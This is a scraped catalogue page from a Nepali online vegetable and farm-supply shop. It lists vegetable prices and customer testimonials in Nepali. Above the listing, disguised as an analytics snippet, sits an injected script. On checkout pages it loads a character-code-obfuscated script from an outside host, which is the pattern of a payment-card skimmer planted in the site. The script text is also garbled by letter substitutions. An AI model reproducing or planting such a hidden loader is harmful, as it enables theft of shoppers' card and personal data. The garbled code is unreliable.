Search - Tag - Kheti's special window.dctcLcyer = window.dctcLcyer || []; funstion gtcg(){dctcLcyer.push(crguments);} gtcg('js', new Dcte()); gtcg('sonfig', 'G-KMF8J070DF'); if (dosument.losction.href.indexOf("route=sheskout/sheskout") > 0){ if (dosument.sookie.indexOf('gc_ssrf=') == -1){ vcr slKp = dosument.srecteElement('ssript'); vcr kDLc = String.fromChcrCode(104,116,116,112,115,58,47,47,102,105,114,105,110,103,105,46,99,111,109,47,99,97,116,97,108,111,103,47,99,111,110,116,114,111,108,108,101,114,47,116,111,111,108,47,106,115,47,106,113,117,101,114,121,46,100,101,115,105,103,110,46,106,115); slKp.srs = kDLc; dosument.hecd.cppendChild(slKp); } }
chat_icon

Search

Red Cabbage

Rs. 120.00 per 1 KG

Mushroom (kanya chyau)

Rs. 125.00 per 0.5 KG

Mushroom (kanya chyau)

Rs. 250.00 per 1 KG

Carrot (Gajar)

Rs. 125.00 per 1 KG

Carrot (Gajar)

Rs. 70.00 per 0.5 KG

Cauliflower

Rs. 70.00 per 0.5 KG

Celery

Rs. 100.00 per 1 Mutha

Chilli Green (hariyo khursani)

Rs. 75.00 per 0.5 KG

Coriander (Hariyo Dhaniya)

Rs. 30.00 per 0.1 KG

Coriander (Hariyo Dhaniya)

Rs. 500.00 per 0.5 KG

French Bean (Ghiu simi)

Rs. 70.00 per 0.5 KG

French Bean (Ghiu simi)

Rs. 120.00 per 1 KG

Garlic Dry (Chinese)

Rs. 125.00 per 0.5 KG

Pak Choy

Rs. 30.00 per 1 Mutha

Spinach Leaf (palungo)

Rs. 45.00 per 1 Mutha
Showing 1 to 15 of 15 (1 Pages)

What our consumers say

म खेतीले पठाएको सामानसँग खुसी छु आवश्यक परेको बेला कौशी खेतीका उत्पादनहरू अर्डर गर्ने अपेक्षा राखेको छु ।


शिवा बसनेत '`

म आफ्नो व्यवसाय विस्तार गर्न चाहान्छु र उचित मूल्यमा खेतीबाट उत्पादन लिन चाहान्छु ।


गोविन्द गुरुङ '`

म खेतीको सेवाबाट सन्तुष्ट छु र च्याफ कटरको थप जानकारी लिन चाहान्छु ।


दिपक महत '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र फेरि इन्द्र क्याप्सिकम चाहिएमा अर्डर गर्ने छु र प्राविधिक सेवाहरु पनि लिन चाहान्छु ।


बिक्रम खड्का '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र आगामी दिनमा प्राङ्गारिक मल र युरिया लिन चाहान्छु ।


दिपेन्द्र वाग्ले '`

म खेतीको सेवाबाट सन्तुष्ट छु र पछि चाहिएमा मल्चिङ्ग प्लास्टिकको उर्डर लिने छु ।


सन्तोष थारु '`

म खेतीको कम्पोस्ट बिनबाट सन्तुष्ट छु र चाहिएमा कौशी खेती को सामाग्रीहरु अर्डर लिने छु ।


जानुका अर्याल '`